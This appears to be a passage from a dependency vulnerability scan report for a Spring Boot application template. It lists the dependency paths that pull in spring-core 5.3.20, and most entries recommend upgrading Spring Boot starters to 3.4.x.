  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-devtools@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-devtools@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-actuator-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-thymeleaf@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-thymeleaf@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-aop@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.4.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.data:spring-data-jpa@2.7.2 org.springframework:spring-tx@7.0.0-M9 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework:spring-jdbc@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.data:spring-data-jpa@2.7.2 org.springframework.data:spring-data-commons@4.0.0-M6 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.data:spring-data-jpa@2.7.2 org.springframework:spring-orm@7.0.0-M9 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-config@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework:spring-web@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework:spring-web@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework:spring-webmvc@5.3.22 org.springframework:spring-web@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.hateoas:spring-hateoas@1.5.1 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.hateoas:spring-hateoas@1.5.1 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-aop@2.7.3 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.4.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.data:spring-data-jpa@2.7.2 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-config@5.7.3 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework:spring-webmvc@5.3.22 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.hateoas:spring-hateoas@1.5.1 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-devtools@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-devtools@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework:spring-context-support@5.3.22 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework:spring-context-support@5.3.22 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.data:spring-data-jpa@2.7.2 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-config@5.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework:spring-webmvc@5.3.22 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.data:spring-data-jpa@2.7.2 org.springframework:spring-tx@7.0.0-M9 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework:spring-jdbc@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.data:spring-data-jpa@2.7.2 org.springframework.data:spring-data-commons@4.0.0-M6 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.data:spring-data-jpa@2.7.2 org.springframework:spring-orm@7.0.0-M9 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-config@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework:spring-web@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework:spring-web@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework:spring-webmvc@5.3.22 org.springframework:spring-web@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.hateoas:spring-hateoas@1.5.1 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-devtools@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-devtools@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework:spring-context-support@5.3.22 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework:spring-context-support@5.3.22 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.data:spring-data-jpa@2.7.2 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-config@5.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework:spring-webmvc@5.3.22 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-config@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.10.
